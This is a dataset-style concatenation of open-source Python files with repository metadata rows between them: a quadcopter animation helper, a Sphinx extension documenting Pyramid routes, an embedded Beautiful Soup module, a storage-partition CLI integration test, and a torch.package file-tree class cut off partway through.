        :param y: (> 0) maximum y bound
        :param z: (> 0) maximum z bound
        :return: NONE, sets pre-existing figure properties
        """
        ax = plt.gca()
        ax.set_xlim3d([0.0, x])                 # x
        ax.set_ylim3d([0.0, y])                 # y
        ax.set_zlim3d([0.0, z])                 # z
        ax.set_xlabel('X')
        ax.set_ylabel('Y')
        ax.set_zlabel('Altitude')
        ax.set_title('Quadcopter Simulation')

    def plot_waypoints(self, wpts):
        # TODO: pre-plot the points that the quadcopter is trying to maneuver over
        pass

    def update_quad(self, itr, pos_data, pos_obj):
        """
        FuncAnimation() callback function that updates the lines in the the animation figure that was initialized in __init__()
        :param itr: integer counter of the simulation step
        :param pos_data: Qx3xN array of position data
        :param pos_obj: [] array NOT IN USE, will be line object corresponding to each quadcopter
        :return: NONE, sets pre-existing figure properties
        """
        quad_pos_world = self.quad_pos_world(self._full_state[:, itr])          # position in world frame coordinates
        ax = plt.gca()
        lines = ax.get_lines()          # 5 line objects per quadcopter [arm1, arm2, center of mass, waypoint, historical tail
        # Pair each line object with its endpoints: columns 0&2 / 1&3 are the
        # opposite arm tips, 4&5 are center-of-mass and top of the body.
        lines_data = [quad_pos_world[:, [0, 2]], quad_pos_world[:, [1, 3]], quad_pos_world[:, [4, 5]]]          # pairs data with correct line object
        # plot world coordinates of quadcopter arms
        for line_obj, line_data in zip(lines[0:3], lines_data):
            x, y, z = line_data
            line_obj.set_data(x, y)
            line_obj.set_3d_properties(z)
        # trailing line/history update (lines[3], the waypoint line, is left
        # untouched here — see plot_waypoints TODO).
        lines[4].set_data(pos_data[0, 0:2, :itr])
        lines[4].set_3d_properties(pos_data[0, 2, :itr])

    def quad_pos_world(self, state, L=0.046, H=0.05):
        """
        Takes in quadcopter parameters and state information and returns the 3-D position in the world frame
        :param state: 13x1 quadcopter state at a specific simulation iteration
        :param L: length of quadcopter arm from center of mass in meters, assumes all arms are the same
        :param H: height of the quadcoper in meters
        :return: position of the vehicle in world frame
        """
        pos = state[0:3]
        q = state[6:10]
        rot = quadcopter.Quadcopter.quat2rot(q)         # express quaternion rotation as a rotation matrix, ZXY rotation type

        # homogeneous transform from body to world frame
        padding = np.array([0, 0, 0, 1])                # allows rigid body rotation about a point wrt SO(3) definition
        wHb = np.concatenate((np.concatenate((rot, pos[:, None]), axis=1), padding[None, :]), axis=0)

        # Homogeneous coordinates of the 4 arm tips, the center, and a point
        # H above the center (body z-axis marker), one column each.
        body_frame = np.transpose(np.array([
                [L, 0, 0, 1],
                [0, L, 0, 1],
                [-L, 0, 0, 1],
                [0, -L, 0, 1],
                [0, 0, 0, 1],
                [0, 0, H, 1]
        ]))

        world_frame = np.matmul(wHb, body_frame)
        quad_pos_world = world_frame[0:3, :]

        return quad_pos_world
| 44.194969
| 154
| 0.612637
|
4a159a2173099b23d5b06695e800eee68088490c
| 87
|
py
|
Python
|
pymatex/listener/__init__.py
|
Gawaboumga/PyMatex
|
3ccc0aa23211a064aa31a9b509b108cd606a4992
|
[
"MIT"
] | 1
|
2019-03-05T09:45:04.000Z
|
2019-03-05T09:45:04.000Z
|
pymatex/listener/__init__.py
|
Gawaboumga/PyMatex
|
3ccc0aa23211a064aa31a9b509b108cd606a4992
|
[
"MIT"
] | null | null | null |
pymatex/listener/__init__.py
|
Gawaboumga/PyMatex
|
3ccc0aa23211a064aa31a9b509b108cd606a4992
|
[
"MIT"
] | null | null | null |
from pymatex.listener.MatexAST import *
from pymatex.listener.MatexASTVisitor import *
| 29
| 46
| 0.83908
|
4a159b973ca74513c45d8ba32b02c0973c115e75
| 11,116
|
py
|
Python
|
pyramid_autodoc/__init__.py
|
mfaraji/pyramid_autodoc
|
2f527f886309a1266befec8551bd9eb1bba2b6fe
|
[
"MIT"
] | null | null | null |
pyramid_autodoc/__init__.py
|
mfaraji/pyramid_autodoc
|
2f527f886309a1266befec8551bd9eb1bba2b6fe
|
[
"MIT"
] | null | null | null |
pyramid_autodoc/__init__.py
|
mfaraji/pyramid_autodoc
|
2f527f886309a1266befec8551bd9eb1bba2b6fe
|
[
"MIT"
] | null | null | null |
"""
Sphinx extension that is able to convert pyramid routes to rst
"""
import sys
import docutils
from docutils import nodes
from docutils.parsers.rst import Directive, directives
from pyramid.compat import PY3
from pyramid.compat import string_types
from pyramid.config import Configurator
from pyramid.scripting import prepare
from pyramid_autodoc.utils import get_route_data, ANY_KEY
from sphinxcontrib.autohttp.common import http_directive
from sphinxcontrib import httpdomain
from docutils.statemachine import ViewList
from sphinx import addnodes
from sphinx.util.nodes import nested_parse_with_titles
from montague import load_app
import re
class RouteDirective(Directive):
    """ Route directive.

    Injects sections in the documentation about the routes registered in the
    given module.

    Usage, in a sphinx documentation::

        .. pyramid-autodoc:: development.ini
           :skip: ^/status
           :match: ^/v1
    """
    has_content = True
    required_arguments = 1
    option_spec = {
        'match-path': directives.unchanged,
        'match-module': directives.unchanged,
        'skip-path': directives.unchanged,
        # BUG(review): the original dict listed 'match-module' twice; the
        # duplicate key was silently discarded by Python. Given the
        # skip-path / module_blacklist filters it was most likely meant to
        # be 'skip-module' — TODO confirm against the option handling code
        # before adding it. The redundant entry is removed here (no behavior
        # change).
        'format': directives.unchanged,
        'link-code': directives.flag,
        'link-code-pattern': directives.unchanged,
    }
    def __init__(self, *args, **kwargs):
        """Forward to Directive and cache the Sphinx build environment."""
        super(RouteDirective, self).__init__(*args, **kwargs)
        # Sphinx BuildEnvironment, reached through the docutils document
        # settings; used later e.g. for serial numbers.
        self.env = self.state.document.settings.env
def matches_pattern(self, filters, value):
if filters is not None:
for path_filter in filters:
if re.match(path_filter, value):
return True
return False
def get_routes(self, config_file, path_blacklist=None, path_whitelist=None,
module_blacklist=None, module_whitelist=None):
app = load_app(config_file)
env = prepare()
registry = env['registry']
config = Configurator(registry=registry)
mapper = config.get_routes_mapper()
try: # only supported in pyramid 1.6
routes = mapper.get_routes(include_static=True)
except:
routes = mapper.get_routes()
mapped_routes = []
for route in routes:
route_data = get_route_data(route, registry)
for name, pattern, view, method, docs, src in route_data:
if path_blacklist:
if self.matches_pattern(path_blacklist, pattern):
continue
if path_whitelist:
if not self.matches_pattern(path_whitelist, pattern):
continue
if module_blacklist:
if self.matches_pattern(module_blacklist, view):
continue
if module_whitelist:
if not self.matches_pattern(module_whitelist, view):
continue
mapped_routes.append({
'name': name,
'pattern': pattern,
'view': view,
'method': method,
'docs': trim(docs),
'view_module': src.get('module_name'),
'view_callable': src.get('callable_name'),
'source_lines': src.get('source_lines'),
})
return mapped_routes
def make_httpdomain_rst(self, mapped_routes):
node = nodes.section()
node.document = self.state.document
result = ViewList()
routes = {}
for route in mapped_routes:
if route['method'] == ANY_KEY:
method = 'any'
else:
method = route['method']
directives = http_directive(
method,
route['pattern'],
route['docs'],
)
routes[(method, route['pattern'])] = route
for line in directives:
result.append(line, '<autopyramid>')
nested_parse_with_titles(self.state, result, node)
for objnode in node.traverse(addnodes.desc):
if objnode.get('domain') != 'http':
continue
for signode in objnode:
if not isinstance(signode, addnodes.desc_signature):
continue
method = signode.get('method')
path = signode.get('path')
mapped_route = routes.get((method, path))
if not method or not path or not mapped_route:
continue
xref_node = self._make_view_source_xref(mapped_route)
if not xref_node:
continue
xref_node += nodes.inline('', '[source]',
classes=['viewcode-link'])
source_node = addnodes.only(expr='html')
source_node += xref_node
signode += source_node
return node.children
def make_custom_rst(self, mapped_routes):
custom_nodes = []
for mapped_route in mapped_routes:
env = self.state.document.settings.env
route_id = "route-%d" % env.new_serialno('route')
route_node = nodes.section(ids=[route_id])
title = mapped_route['pattern']
route_node += nodes.title(text=title)
real_table = nodes.table('')
group = nodes.tgroup('', cols=2)
real_table += group
group += nodes.colspec('', colwidth=10)
group += nodes.colspec('', colwidth=90)
body = nodes.tbody('')
group += body
def get_row(*column_texts):
row = nodes.row('')
for text in column_texts:
if isinstance(text, string_types):
text_node = nodes.Text(text)
else:
text_node = text
node = nodes.paragraph('', '', text_node)
row += nodes.entry('', node)
return row
view_node = self._make_view_source_xref(mapped_route)
if view_node:
view_node += nodes.Text(mapped_route['view'])
else:
view_node = mapped_route['view']
body += get_row('Module', view_node)
body += get_row('Request Method', mapped_route['method'])
body += get_row('Route Name', mapped_route['name'])
route_node.append(real_table)
if mapped_route['docs']:
route_node += rst2node(
mapped_route['view'], mapped_route['docs']
)
custom_nodes.append(route_node)
return custom_nodes
def _make_view_source_xref(self, mapped_route):
if 'link-code' not in self.options or \
not mapped_route['view_callable'] or \
not mapped_route['view_module'] or \
not mapped_route['source_lines']:
return
env = self.state.document.settings.env
link_code_pattern = self.options.get('link-code-pattern')
if link_code_pattern:
filepath = mapped_route['view_module'].replace('.', '/') + '.py'
uri = link_code_pattern.format(
file=filepath,
lineno_start=mapped_route['source_lines'][0],
lineno_end=mapped_route['source_lines'][1],
)
xref_node = nodes.reference('', '', internal=False, refuri=uri)
else:
if 'sphinx.ext.viewcode' not in env.config.extensions:
return
source_page = (
'_modules/' + mapped_route['view_module'].replace('.', '/'))
xref_node = addnodes.pending_xref(
'', reftype='viewcode', refdomain='std', refexplicit=False,
reftarget=source_page,
refid=mapped_route['view_callable'],
refdoc=env.docname)
return xref_node
def run(self):
ini_file = self.arguments[0]
fmt = self.options.get('format', 'custom')
path_blacklist = self.options.get('skip-path', '').split() or None
path_whitelist = self.options.get('match-path', '').split() or None
module_blacklist = self.options.get('skip-module', '').split() or None
module_whitelist = self.options.get('match-module', '').split() or None
routes = self.get_routes(
ini_file,
path_blacklist=path_blacklist,
path_whitelist=path_whitelist,
module_blacklist=module_blacklist,
module_whitelist=module_whitelist,
)
if fmt == 'custom':
return self.make_custom_rst(routes)
elif fmt == 'httpdomain':
return self.make_httpdomain_rst(routes)
else:
raise Exception('Unsupported format %s' % fmt)
def trim(docstring):
    """Normalise a docstring's indentation and surrounding blank lines.

    Tabs are expanded to spaces, the common leading indentation of all
    continuation lines is removed, and leading/trailing blank lines are
    stripped.  Implementation follows http://www.python.org/dev/peps/pep-0257/
    """
    if not docstring:
        return ''
    # Expand tabs (normal Python rules) and work line by line.
    lines = docstring.expandtabs().splitlines()
    # Smallest indent shared by all non-blank continuation lines; the
    # first line is excluded because it sits right after the quotes.
    margin = sys.maxsize
    for candidate in lines[1:]:
        body = candidate.lstrip()
        if body:
            margin = min(margin, len(candidate) - len(body))
    # First line is special: just strip it outright.
    cleaned = [lines[0].strip()]
    if margin < sys.maxsize:
        cleaned.extend(candidate[margin:].rstrip() for candidate in lines[1:])
    # Drop blank lines at both ends.
    while cleaned and not cleaned[-1]:
        cleaned.pop()
    while cleaned and not cleaned[0]:
        del cleaned[0]
    res = '\n'.join(cleaned)
    # On Python 2 make sure we hand back unicode, not bytes.
    if not PY3 and not isinstance(res, unicode):
        res = res.decode('utf8')
    return res
class Env(object):
    # Minimal stand-in for the Sphinx/docutils build environment that
    # rst2node() attaches to the generated document settings.
    # NOTE(review): both attributes are class-level (shared) state; that is
    # fine for this throwaway object as long as instances never mutate
    # temp_data in place.
    temp_data = {}
    docname = ''
def rst2node(doc_name, data):
    """Parse *data* as reStructuredText and return the resulting node.

    Returns None for empty input, the single child when the parsed
    document has exactly one, otherwise a paragraph wrapping them all.
    """
    if not data:
        return
    # Build default docutils settings, then tweak them for our use case.
    settings = docutils.frontend.OptionParser().get_default_values()
    settings.tab_width = 4
    settings.pep_references = False
    settings.rfc_references = False
    settings.env = Env()
    document = docutils.utils.new_document('<%s>' % doc_name)
    document.settings = settings
    docutils.parsers.rst.Parser().parse(data, document)
    children = document.children
    if len(children) == 1:
        return children[0]
    # Several top-level nodes: wrap them in a single paragraph.
    container = docutils.nodes.paragraph()
    for child in children:
        container += child
    return container
def setup(app):
    """Hook the directives when Sphinx ask for it."""
    # httpdomain must be loaded first: make_httpdomain_rst() emits its
    # directives.
    app.setup_extension('sphinxcontrib.httpdomain')
    app.add_directive('autopyramid', RouteDirective)
| 32.887574
| 79
| 0.574307
|
4a159b9a6ef32abab9b6c2226c8757dec82b701c
| 15,056
|
py
|
Python
|
pylinkvalidator/included/bs4/__init__.py
|
airsource/pylinkvalidator
|
5a52fea64ecdb867a3390a97c023765265d88d23
|
[
"MIT"
] | 127
|
2015-07-06T03:19:23.000Z
|
2022-03-14T18:34:11.000Z
|
pylinkvalidator/included/bs4/__init__.py
|
airsource/pylinkvalidator
|
5a52fea64ecdb867a3390a97c023765265d88d23
|
[
"MIT"
] | 32
|
2015-07-06T03:18:46.000Z
|
2020-12-14T13:14:23.000Z
|
pylinkvalidator/included/bs4/__init__.py
|
airsource/pylinkvalidator
|
5a52fea64ecdb867a3390a97c023765265d88d23
|
[
"MIT"
] | 36
|
2015-08-06T18:44:53.000Z
|
2022-01-09T12:38:29.000Z
|
"""Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup uses a pluggable XML or HTML parser to parse a
(possibly invalid) document into a tree representation. Beautiful Soup
provides methods and Pythonic idioms that make it easy to
navigate, search, and modify the parse tree.
Beautiful Soup works with Python 2.6 and up. It works better if lxml
and/or html5lib is installed.
For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/bs4/doc/
"""
from __future__ import absolute_import
import sys
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "4.2.1"
__copyright__ = "Copyright (c) 2004-2013 Leonard Richardson"
__license__ = "MIT"
use_system_version = False
try:
    # The system-installed version has priority providing it is not an
    # earlier version. The embedded bs4 only works for Python 2.
    import bs4

    def _version_key(version_string):
        """Best-effort numeric version key, e.g. '4.10.1' -> (4, 10, 1).

        Comparison stops at the first non-numeric component (e.g. '1b').
        """
        parts = []
        for part in version_string.split('.'):
            try:
                parts.append(int(part))
            except ValueError:
                break
        return tuple(parts)

    # BUG FIX: the original compared lists of *strings*, so e.g. '4.10'
    # sorted before '4.2' and a newer system bs4 could be rejected.
    if (_version_key(bs4.__version__) >= _version_key(__version__)) or \
            sys.version_info[0] >= 3:
        from bs4 import *
        # Necessary for direct import in pylinkvalidator
        UnicodeDammit = bs4.UnicodeDammit
        use_system_version = True
        # Make sure we copy over the version. See #17071
        __version__ = bs4.__version__
except ImportError:
    # No system bs4: fall back to the embedded copy, except on Python 3
    # where the embedded (Python 2 only) copy cannot work.
    if sys.version_info[0] >= 3:
        raise
if not use_system_version:
    # Fall back to the embedded (Python 2 only) copy of Beautiful Soup.
    __all__ = ['BeautifulSoup']
    import re
    import warnings
    from .builder import builder_registry
    from .dammit import UnicodeDammit
    from .element import (
        CData,
        Comment,
        DEFAULT_OUTPUT_ENCODING,
        Declaration,
        Doctype,
        NavigableString,
        PageElement,
        ProcessingInstruction,
        ResultSet,
        SoupStrainer,
        Tag,
        )

# The very first thing we do is give a useful error if someone is
# running this code under Python 3 without converting it.
# NOTE(review): this message is defined but nothing visible here raises
# it; the Python 3 case is handled by re-raising ImportError above.
syntax_error = u'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work. You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'
class BeautifulSoup(Tag):
    """
    This class defines the basic interface called by the tree builders.

    These methods will be called by the parser:
      reset()
      feed(markup)

    The tree builder may call these methods from its feed() implementation:
      handle_starttag(name, attrs) # See note about return value
      handle_endtag(name)
      handle_data(data) # Appends to the current data node
      endData(containerClass=NavigableString) # Ends the current data node

    No matter how complicated the underlying parser is, you should be
    able to build a tree using 'start tag' events, 'end tag' events,
    'data' events, and "done with data" events.

    If you encounter an empty-element tag (aka a self-closing tag,
    like HTML's <br> tag), call handle_starttag and then
    handle_endtag.
    """
    ROOT_TAG_NAME = u'[document]'

    # If the end-user gives no indication which tree builder they
    # want, look for one with these features.
    DEFAULT_BUILDER_FEATURES = ['html', 'fast']

    # Used when determining whether a text node is all whitespace and
    # can be replaced with a single space. A text node that contains
    # fancy Unicode spaces (usually non-breaking) should be left
    # alone.
    STRIP_ASCII_SPACES = {9: None, 10: None, 12: None, 13: None, 32: None, }

    def __init__(self, markup="", features=None, builder=None,
                 parse_only=None, from_encoding=None, **kwargs):
        """The Soup object is initialized as the 'root tag', and the
        provided markup (which can be a string or a file-like object)
        is fed into the underlying parser."""

        # The following keyword arguments existed in Beautiful Soup 3 but
        # are no longer honoured; warn (and discard) rather than fail.
        if 'convertEntities' in kwargs:
            warnings.warn(
                "BS4 does not respect the convertEntities argument to the "
                "BeautifulSoup constructor. Entities are always converted "
                "to Unicode characters.")

        if 'markupMassage' in kwargs:
            del kwargs['markupMassage']
            warnings.warn(
                "BS4 does not respect the markupMassage argument to the "
                "BeautifulSoup constructor. The tree builder is responsible "
                "for any necessary markup massage.")

        if 'smartQuotesTo' in kwargs:
            del kwargs['smartQuotesTo']
            warnings.warn(
                "BS4 does not respect the smartQuotesTo argument to the "
                "BeautifulSoup constructor. Smart quotes are always converted "
                "to Unicode characters.")

        if 'selfClosingTags' in kwargs:
            del kwargs['selfClosingTags']
            warnings.warn(
                "BS4 does not respect the selfClosingTags argument to the "
                "BeautifulSoup constructor. The tree builder is responsible "
                "for understanding self-closing tags.")

        if 'isHTML' in kwargs:
            del kwargs['isHTML']
            warnings.warn(
                "BS4 does not respect the isHTML argument to the "
                "BeautifulSoup constructor. You can pass in features='html' "
                "or features='xml' to get a builder capable of handling "
                "one or the other.")

        def deprecated_argument(old_name, new_name):
            # Translate a renamed BS3 keyword argument into its BS4 value,
            # warning the caller about the rename.
            if old_name in kwargs:
                warnings.warn(
                    'The "%s" argument to the BeautifulSoup constructor '
                    'has been renamed to "%s."' % (old_name, new_name))
                value = kwargs[old_name]
                del kwargs[old_name]
                return value
            return None

        parse_only = parse_only or deprecated_argument(
            "parseOnlyThese", "parse_only")

        from_encoding = from_encoding or deprecated_argument(
            "fromEncoding", "from_encoding")

        if len(kwargs) > 0:
            # Python 2 idiom: dict.keys() returns a list here (Python 3
            # would need list(kwargs.keys())[0]) — this embedded copy only
            # runs on Python 2, see the module-level version check.
            arg = kwargs.keys().pop()
            raise TypeError(
                "__init__() got an unexpected keyword argument '%s'" % arg)

        if builder is None:
            # No explicit builder: pick one from the registry by features.
            if isinstance(features, basestring):
                features = [features]
            if features is None or len(features) == 0:
                features = self.DEFAULT_BUILDER_FEATURES
            builder_class = builder_registry.lookup(*features)
            if builder_class is None:
                raise FeatureNotFound(
                    "Couldn't find a tree builder with the features you "
                    "requested: %s. Do you need to install a parser library?"
                    % ",".join(features))
            builder = builder_class()
        self.builder = builder
        self.is_xml = builder.is_xml
        self.builder.soup = self

        self.parse_only = parse_only

        self.reset()

        if hasattr(markup, 'read'):        # It's a file-type object.
            markup = markup.read()
        (self.markup, self.original_encoding, self.declared_html_encoding,
         self.contains_replacement_characters) = (
             self.builder.prepare_markup(markup, from_encoding))

        try:
            self._feed()
        except StopParsing:
            # The builder decided parsing can stop early; the partial tree
            # built so far is kept.
            pass

        # Clear out the markup and remove the builder's circular
        # reference to this object.
        self.markup = None
        self.builder.soup = None

    def _feed(self):
        """Run the prepared markup through the tree builder."""
        # Convert the document to Unicode.
        self.builder.reset()

        self.builder.feed(self.markup)
        # Close out any unfinished strings and close all the open tags.
        self.endData()
        while self.currentTag.name != self.ROOT_TAG_NAME:
            self.popTag()

    def reset(self):
        """Reset parser state so a fresh document can be parsed."""
        Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
        self.hidden = 1
        self.builder.reset()
        self.currentData = []   # pending text chunks not yet made a node
        self.currentTag = None  # innermost open tag
        self.tagStack = []      # stack of currently-open tags
        self.pushTag(self)

    def new_tag(self, name, namespace=None, nsprefix=None, **attrs):
        """Create a new tag associated with this soup."""
        return Tag(None, self.builder, name, namespace, nsprefix, attrs)

    def new_string(self, s, subclass=NavigableString):
        """Create a new NavigableString associated with this soup."""
        navigable = subclass(s)
        navigable.setup()
        return navigable

    def insert_before(self, successor):
        # The document root cannot have siblings.
        raise NotImplementedError("BeautifulSoup objects don't support insert_before().")

    def insert_after(self, successor):
        # The document root cannot have siblings.
        raise NotImplementedError("BeautifulSoup objects don't support insert_after().")

    def popTag(self):
        """Close the innermost open tag and return the new current tag."""
        tag = self.tagStack.pop()
        #print "Pop", tag.name
        if self.tagStack:
            self.currentTag = self.tagStack[-1]
        return self.currentTag

    def pushTag(self, tag):
        """Open *tag* as a child of the current tag."""
        #print "Push", tag.name
        if self.currentTag:
            self.currentTag.contents.append(tag)
        self.tagStack.append(tag)
        self.currentTag = self.tagStack[-1]

    def endData(self, containerClass=NavigableString):
        """Flush self.currentData into a text node of *containerClass*."""
        if self.currentData:
            currentData = u''.join(self.currentData)
            # Collapse all-ASCII-whitespace text to a single space (or
            # newline), unless some open tag is in the builder's
            # preserve_whitespace_tags set.
            if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and
                not set([tag.name for tag in self.tagStack]).intersection(
                    self.builder.preserve_whitespace_tags)):
                if '\n' in currentData:
                    currentData = '\n'
                else:
                    currentData = ' '
            self.currentData = []
            # Honour the SoupStrainer: at the top level, drop text the
            # strainer is not interested in.
            if self.parse_only and len(self.tagStack) <= 1 and \
                   (not self.parse_only.text or \
                    not self.parse_only.search(currentData)):
                return
            o = containerClass(currentData)
            self.object_was_parsed(o)

    def object_was_parsed(self, o, parent=None, most_recent_element=None):
        """Add an object to the parse tree."""
        parent = parent or self.currentTag
        most_recent_element = most_recent_element or self._most_recent_element
        o.setup(parent, most_recent_element)
        if most_recent_element is not None:
            # Keep the document-order linked list of elements intact.
            most_recent_element.next_element = o
        self._most_recent_element = o
        parent.contents.append(o)

    def _popToTag(self, name, nsprefix=None, inclusivePop=True):
        """Pops the tag stack up to and including the most recent
        instance of the given tag. If inclusivePop is false, pops the tag
        stack up to but *not* including the most recent instance of
        the given tag."""
        #print "Popping to %s" % name
        if name == self.ROOT_TAG_NAME:
            # The root tag is never popped.
            return

        numPops = 0
        mostRecentTag = None

        # Search from the innermost open tag outwards for a name (and
        # namespace prefix) match.
        for i in range(len(self.tagStack) - 1, 0, -1):
            if (name == self.tagStack[i].name
                and nsprefix == self.tagStack[i].prefix):
                numPops = len(self.tagStack) - i
                break
        if not inclusivePop:
            numPops = numPops - 1

        for i in range(0, numPops):
            mostRecentTag = self.popTag()
        return mostRecentTag

    def handle_starttag(self, name, namespace, nsprefix, attrs):
        """Push a start tag on to the stack.

        If this method returns None, the tag was rejected by the
        SoupStrainer. You should proceed as if the tag had not occured
        in the document. For instance, if this was a self-closing tag,
        don't call handle_endtag.
        """
        # print "Start tag %s: %s" % (name, attrs)

        self.endData()

        # Honour the SoupStrainer at the top level.
        if (self.parse_only and len(self.tagStack) <= 1
            and (self.parse_only.text
                 or not self.parse_only.search_tag(name, attrs))):
            return None

        tag = Tag(self, self.builder, name, namespace, nsprefix, attrs,
                  self.currentTag, self._most_recent_element)
        if tag is None:
            return tag
        if self._most_recent_element:
            self._most_recent_element.next_element = tag
        self._most_recent_element = tag
        self.pushTag(tag)
        return tag

    def handle_endtag(self, name, nsprefix=None):
        """Close the most recent open tag matching *name*."""
        #print "End tag: " + name
        self.endData()
        self._popToTag(name, nsprefix)

    def handle_data(self, data):
        """Buffer character data until endData() turns it into a node."""
        self.currentData.append(data)

    def decode(self, pretty_print=False,
               eventual_encoding=DEFAULT_OUTPUT_ENCODING,
               formatter="minimal"):
        """Returns a string or Unicode representation of this document.
        To get Unicode, pass None for encoding."""

        if self.is_xml:
            # Print the XML declaration
            encoding_part = ''
            if eventual_encoding != None:
                encoding_part = ' encoding="%s"' % eventual_encoding
            prefix = u'<?xml version="1.0"%s?>\n' % encoding_part
        else:
            prefix = u''
        if not pretty_print:
            indent_level = None
        else:
            indent_level = 0
        return prefix + super(BeautifulSoup, self).decode(
            indent_level, eventual_encoding, formatter)
# Aliases to make it easier to type import: 'from bs4 import _soup'
_s = BeautifulSoup
_soup = BeautifulSoup
class BeautifulStoneSoup(BeautifulSoup):
    """Deprecated interface to an XML parser.

    Kept only for Beautiful Soup 3 compatibility; it simply forces
    ``features='xml'`` and warns the caller.
    """

    def __init__(self, *args, **kwargs):
        warnings.warn(
            'The BeautifulStoneSoup class is deprecated. Instead of using '
            'it, pass features="xml" into the BeautifulSoup constructor.')
        kwargs['features'] = 'xml'
        super(BeautifulStoneSoup, self).__init__(*args, **kwargs)
class StopParsing(Exception):
    # Raised (by a tree builder — not shown in this module) to abort
    # parsing early; BeautifulSoup.__init__ catches and ignores it.
    pass
class FeatureNotFound(ValueError):
    # Raised by BeautifulSoup.__init__ when builder_registry.lookup()
    # cannot satisfy the requested parser features.
    pass
# By default, act as an HTML pretty-printer.
if __name__ == '__main__':
    # Fix: dropped the redundant re-import of sys — it is already imported
    # at module level above.
    soup = BeautifulSoup(sys.stdin)
    print(soup.prettify())
| 38.506394
| 236
| 0.577378
|
4a159c7c8e03ac2eb75917f26c9e8af6b26ad772
| 73
|
py
|
Python
|
variables/prodna/__init__.py
|
rohithasrk-bidgely/cloudformation-config-generation
|
d72d362c77b220169b3ccdd0b4a921910f7172ff
|
[
"MIT"
] | null | null | null |
variables/prodna/__init__.py
|
rohithasrk-bidgely/cloudformation-config-generation
|
d72d362c77b220169b3ccdd0b4a921910f7172ff
|
[
"MIT"
] | 9
|
2018-07-09T08:46:12.000Z
|
2018-07-18T09:13:03.000Z
|
variables/uat/__init__.py
|
rohithasrk-bidgely/cloudformation-config-generation
|
d72d362c77b220169b3ccdd0b4a921910f7172ff
|
[
"MIT"
] | null | null | null |
from .alarms import *
from .variables import *
from .components import *
| 18.25
| 25
| 0.753425
|
4a159c85bface6caa59de79899ee31ba519f4e35
| 939
|
py
|
Python
|
test-framework/test-suites/integration/tests/add/test_add_host_storage_partition.py
|
kmcm0/stacki
|
eb9dff1b45d5725b4986e567876bf61707fec28f
|
[
"BSD-3-Clause"
] | 123
|
2015-05-12T23:36:45.000Z
|
2017-07-05T23:26:57.000Z
|
test-framework/test-suites/integration/tests/add/test_add_host_storage_partition.py
|
kmcm0/stacki
|
eb9dff1b45d5725b4986e567876bf61707fec28f
|
[
"BSD-3-Clause"
] | 177
|
2015-06-05T19:17:47.000Z
|
2017-07-07T17:57:24.000Z
|
test-framework/test-suites/integration/tests/add/test_add_host_storage_partition.py
|
kmcm0/stacki
|
eb9dff1b45d5725b4986e567876bf61707fec28f
|
[
"BSD-3-Clause"
] | 32
|
2015-06-07T02:25:03.000Z
|
2017-06-23T07:35:35.000Z
|
import json
from textwrap import dedent
class TestAddHostStoragePartition:
    """Integration tests for `stack add host storage partition`.

    `host` and `add_host` are pytest fixtures supplied by the test
    framework: `host` runs commands on the target machine, `add_host`
    provisions the `backend-0-0` host used below.
    """

    def test_no_args(self, host):
        # Omitting the mandatory `host` argument must fail with the
        # command's usage message on stderr.
        result = host.run('stack add host storage partition')
        assert result.rc == 255
        assert result.stderr == dedent('''\
            error - "host" argument is required
            {host ...} {device=string} {size=integer} [mountpoint=string] [options=string] [partid=integer] [type=string]
            ''')

    def test_all_params(self, host, add_host):
        # Add a partition specifying every supported parameter ...
        result = host.run(
            'stack add host storage partition backend-0-0 device=sda mountpoint=/ '
            'size=1024 type=ext4 options=test_options partid=1'
        )
        assert result.rc == 0

        # ... then verify it round-trips through `list` unchanged.
        result = host.run('stack list host storage partition backend-0-0 output-format=json')
        assert result.rc == 0
        assert json.loads(result.stdout) == [{
            "host": "backend-0-0",
            "device": "sda",
            "partid": 1,
            "mountpoint": "/",
            "size": 1024,
            "fstype": "ext4",
            "options": "test_options",
            "source": "H"
        }]
| 28.454545
| 112
| 0.669862
|
4a159cdb863f3c2858a164495f57265fbd256df6
| 2,514
|
py
|
Python
|
torch/package/_file_structure_representation.py
|
vladap2013/pytorch
|
30367773056de95e006107d82ddaa3db5eeaa05a
|
[
"Intel"
] | 1
|
2021-06-17T13:02:45.000Z
|
2021-06-17T13:02:45.000Z
|
torch/package/_file_structure_representation.py
|
vladap2013/pytorch
|
30367773056de95e006107d82ddaa3db5eeaa05a
|
[
"Intel"
] | null | null | null |
torch/package/_file_structure_representation.py
|
vladap2013/pytorch
|
30367773056de95e006107d82ddaa3db5eeaa05a
|
[
"Intel"
] | null | null | null |
from typing import Dict, List
from ._glob_group import GlobPattern, _GlobGroup
class Folder:
    """Node in a lightweight file-tree representation.

    A ``Folder`` is either a directory (``is_dir=True``, with children)
    or a file leaf (``is_dir=False``, no children).  ``str(folder)``
    renders the subtree with box-drawing characters, listing
    subdirectories before files, each group sorted by name.

    Improvements over the previous revision: docstrings and the return
    type annotations that were missing from this otherwise-typed module.
    """

    def __init__(self, name: str, is_dir: bool):
        self.name = name
        self.is_dir = is_dir
        self.children: Dict[str, Folder] = {}

    def get_folder(self, folders: List[str]) -> "Folder":
        """Return the directory at the given path below ``self``.

        Builds the chain of intermediate directories if it does not exist
        yet, and returns the last folder on the path.
        """
        if len(folders) == 0:
            return self
        folder_name = folders[0]
        if folder_name not in self.children:
            self.children[folder_name] = Folder(folder_name, True)
        return self.children[folder_name].get_folder(folders[1:])

    def add_file(self, file_path: str) -> None:
        """Record ``file_path`` (e.g. ``"a/b/c.py"``) as a file leaf."""
        *folders, file = file_path.split("/")
        folder = self.get_folder(folders)
        folder.children[file] = Folder(file, False)

    def __str__(self) -> str:
        str_list: List[str] = []
        self.stringify_tree(str_list)
        return "".join(str_list)

    def stringify_tree(
        self, str_list: List[str], preamble: str = "", folder_ptr: str = "─── "
    ) -> None:
        """Append this subtree's text rendering to ``str_list``.

        ``preamble`` is the indentation inherited from ancestors and
        ``folder_ptr`` the connector drawn before this node's name.
        """
        space = "    "
        branch = "│   "
        tee = "├── "
        last = "└── "

        # add this folder's representation
        str_list.append(f"{preamble}{folder_ptr}{self.name}\n")

        # add folder's children representations; a tee connector means
        # more siblings follow, so the vertical bar must continue.
